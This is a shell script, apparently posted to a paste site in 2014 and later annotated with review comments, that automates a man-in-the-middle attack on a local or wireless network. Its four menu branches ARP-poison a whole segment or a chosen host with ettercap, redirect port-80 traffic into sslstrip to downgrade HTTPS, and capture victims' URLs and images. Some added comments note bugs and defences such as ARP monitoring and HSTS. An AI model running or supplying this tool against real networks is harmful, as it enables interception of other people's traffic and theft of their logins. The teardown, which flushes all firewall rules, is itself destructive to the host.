
Man In the Middle Attack

Jul 22nd, 2014
  1. #!/bin/sh
  2. clear
  3. # This cript was written by me n1tr0g3n with a lot of input from R4V3N747700 and help from all the guys on the Top-Hat-Sec.com Forum.
  4. #Thanks to TAPE for his input and suggestions which were utilized into the script to make it more functional. And a #special thanks to my lovely girlfriend who puts up with me being on the #computer all the time, I love you with all my #heart. We do this for the security community and hope you guys enjoy our work. Thanks for using the script and we hope #it #works wel #for you.
  5. echo
  6. echo ""
  7. echo ""
  8. echo ""
  9. echo ""
  10. echo ""
  11. echo "                             n1tr0g3n's all in one Network Sniffer";
  12. echo ""
  13. echo "                                 coded with help by R4V3N747700"
  14. echo ""
  15. echo "                             www.n1tr0g3n.com & www.Top-Hat-Sec.com";
  16.  
  17.  
  18. sleep 3
  19. clear
  20. echo ""
  21. echo ""
  22. echo "--------------------------------------------------------------------------------------------------"
  23. echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
  24. echo "--------------------------------------------------------------------------------------------------"
  25. echo ""
  26. echo "                       If SSLstrip gives you errors please rerun the script"
  27. echo ""
  28. echo "              when done with the attack click ENTER in the ettercap window to cleanup"
  29. echo ""
  30. echo ""
  31. sleep 4
  32. clear
  33.  
  34.  
  35. #This command will ask you for your interface name
  36. echo
  37. echo "                       Please type the name of your network interface in below";
  38. read IFACE;
  39. sleep 2
  40. echo ""
  41. echo ""
  42. clear
  43. echo ""
  44. echo " ----------------------------------------------------------------------------------"
  45. echo ""
  46. echo " |-----------------------------------| |-----------------------------------|"
  47. echo " |        Attack Entire Gateway      | |      Attack single host           |"
  48. echo " |     1 For LAN attack              | | 3 For LAN attack                  |"
  49. echo " |                                   | |                                   |"
  50. echo " |     2 For Wireless Attack         | | 4 For Wireless Attack             |"
  51. echo " |-----------------------------------| |-----------------------------------|"
  52. echo ""
  53. echo " ----------------------------------------------------------------------------------"
  54. echo ""
  55. echo ""
  56. echo ""
  57. echo " Select Menu Option: "
  58. read menuoption
# Menu dispatch. Options 1-4 run the same pipeline and differ only in the
# ettercap invocation (which targets are named, and whether -i $IFACE is
# passed):
#   enable IPv4 forwarding -> open driftnet and urlsnarf -> redirect TCP/80
#   to local port 10000 -> ARP-poison with ettercap -> run sslstrip on port
#   10000 -> wait for ENTER -> tear everything down.
# Any other menu value matches no branch and the script ends without doing
# anything.
#
# Review notes that apply to all four branches:
#   * No trap is installed. If the script is interrupted before the teardown
#     section, ip_forward stays at 1 and the REDIRECT rule stays in the nat
#     table.
#   * The writes to /proc/sys/net/ipv4/ip_forward and the teardown
#     killall/iptables calls are not run through sudo, unlike the setup
#     commands, so the script presumably expects to be started as root --
#     confirm.
#   * $menuoption, $IFACE and the gateway/host variables are expanded
#     unquoted. An empty menu answer makes `[` report a syntax error rather
#     than select a branch.
#   * grep 'UG[ \t]': inside a bracket expression \t is a literal backslash
#     and "t", not a tab; the match works because route -n pads the Flags
#     column with spaces.
#
# Defender's view of what this pipeline produces on the wire and on the host:
#   * ARP cache poisoning shows up as the gateway's IP address suddenly
#     mapping to a different MAC address. ARP-table monitoring (arpwatch
#     style) detects it; Dynamic ARP Inspection on the switch prevents it.
#   * Only cleartext TCP/80 is redirected into sslstrip. Clients that never
#     issue the initial plain-HTTP request (HTTPS-only sites with HSTS,
#     ideally preloaded) are not affected by the stripping stage, and
#     driftnet/urlsnarf only see unencrypted HTTP.
#   * On the relaying host itself: ip_forward=1, a nat PREROUTING REDIRECT to
#     port 10000, and a listener on 10000 are the visible artefacts.

# --- Option 1: whole segment, wired --------------------------------------
if [ $menuoption = "1" ]; then

# Show the default gateway parsed from the routing table (rows flagged UG).
echo "This should be your Gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your Gateway in below";
# NOTE(review): GATEWAY is read here but never used in this branch.
read GATEWAY;
echo ""
echo ""
echo "Starting attack on Gateway"
# Prints the detected gateway again, not the value the operator typed.
route -n | grep 'UG[ \t]' | awk '{print $2}'
sleep 2
# Turn this host into a router so relayed traffic keeps flowing.
# The previous value is not saved.
echo "1" > /proc/sys/net/ipv4/ip_forward


# driftnet: displays images seen in cleartext traffic on $IFACE.
sudo xterm -e driftnet -i $IFACE &


# urlsnarf: prints URLs requested over cleartext HTTP on $IFACE.
sudo xterm -e urlsnarf -i $IFACE &


# Send all forwarded TCP/80 traffic to the local listener on port 10000.
# The rule is appended (-A), so each re-run without teardown adds another copy.
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# ettercap: -T text UI, -q quiet, -M ARP:REMOTE = ARP-poisoning MITM.
# Both target specs are empty (// //), i.e. no host is singled out, and no
# -i is given, so ettercap chooses its own default interface instead of
# $IFACE. Runs in the background of this terminal, not in an xterm.
ettercap -TqM ARP:REMOTE // // &


# sslstrip: -l 10000 listens where the REDIRECT rule points; -a logs all
# traffic it handles, not only POSTs.
sudo xterm -e sslstrip -a -l 10000 &
echo
echo "Press ENTER to stop session"
read ENTERKEY

# Teardown. NOTE(review): this is broader than what the script set up:
#   - killall matches by process name, so every xterm (and any unrelated
#     ettercap/urlsnarf/sslstrip) the caller may signal is killed. driftnet
#     is not named and presumably exits when its xterm is killed -- confirm.
#   - ip_forward is forced to 0 regardless of its value before the run.
#   - The flush/delete-chain calls wipe ALL rules and user-defined chains in
#     the filter and nat tables, not only the one REDIRECT rule added above,
#     so a pre-existing host firewall ruleset is lost.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# --- Option 2: whole segment, wireless -----------------------------------
if [ $menuoption = "2" ]; then

# Show the default gateway parsed from the routing table, then ask for it.
echo "This should be your gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY;
echo ""

echo "Starting attack on gateway"
route -n | grep 'UG[ \t]' | awk '{print $2}'
sleep 2


# Enable IPv4 forwarding on this host (previous value not saved).
echo "1" > /proc/sys/net/ipv4/ip_forward


# driftnet: displays images seen in cleartext traffic on $IFACE.
sudo xterm -e driftnet -i $IFACE &


# urlsnarf: prints URLs requested over cleartext HTTP on $IFACE.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect forwarded TCP/80 to the local listener on port 10000.
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Unlike option 1, this passes -i $IFACE and names the typed gateway as the
# first target; the second target spec is left empty.
ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY/ // &
#sudo xterm -e ettercap -TqM ARP:REMOTE // // & -----> command for LAN


# sslstrip on port 10000, logging all traffic it handles (-a).
sudo xterm -e sslstrip -a -l 10000 &


echo "Press ENTER to stop session"
read ENTERKEY

# Teardown: same over-broad killall / full iptables flush as in option 1.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# --- Option 3: single host, wired ----------------------------------------
if [ $menuoption = "3" ]; then
echo ""
echo ""
echo "This should be your gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY3;
echo ""
echo ""
echo "Please type the IP of the target host below";
read HOST3;
echo ""
echo ""
echo " Starting Attack on Target Host"
sleep 2


# Enable IPv4 forwarding on this host (previous value not saved).
echo "1" > /proc/sys/net/ipv4/ip_forward


# driftnet: displays images seen in cleartext traffic on $IFACE.
sudo xterm -e driftnet -i $IFACE &


# urlsnarf: prints URLs requested over cleartext HTTP on $IFACE.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect forwarded TCP/80 to the local listener on port 10000.
# NOTE(review): the rule is not limited to $HOST3; it applies to all
# forwarded port-80 traffic.
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Poisoning is limited to the gateway/host pair typed above. As in option 1,
# no -i is passed, so $IFACE is not used by ettercap here.
ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &


# NOTE(review): this is the only branch that starts the sslstrip xterm
# without sudo; the other three use "sudo xterm -e sslstrip ...".
xterm -e sslstrip -a -l 10000 &

echo "Press ENTER to stop session"
read ENTERKEY

# Teardown: same over-broad killall / full iptables flush as in option 1.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# --- Option 4: single host, wireless -------------------------------------
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo "This should be your Gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY4;
echo ""
echo ""
echo "Please type the IP of the target host below";
read HOST4;
echo ""
echo ""
echo " Starting Attack on Target Host"
sleep 2


# Enable IPv4 forwarding on this host (previous value not saved).
echo "1" > /proc/sys/net/ipv4/ip_forward


# driftnet: displays images seen in cleartext traffic on $IFACE.
sudo xterm -e driftnet -i $IFACE &


# urlsnarf: prints URLs requested over cleartext HTTP on $IFACE.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect forwarded TCP/80 to the local listener on port 10000
# (not limited to $HOST4).
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Same gateway/host pairing as option 3, but bound to $IFACE with -i.
ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &


# sslstrip on port 10000, logging all traffic it handles (-a).
sudo xterm -e sslstrip -a -l 10000 &


echo "Press ENTER to stop session"
read ENTERKEY

# Teardown: same over-broad killall / full iptables flush as in option 1.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Close the four nested tests, innermost (option 4) first.
fi
fi
fi
fi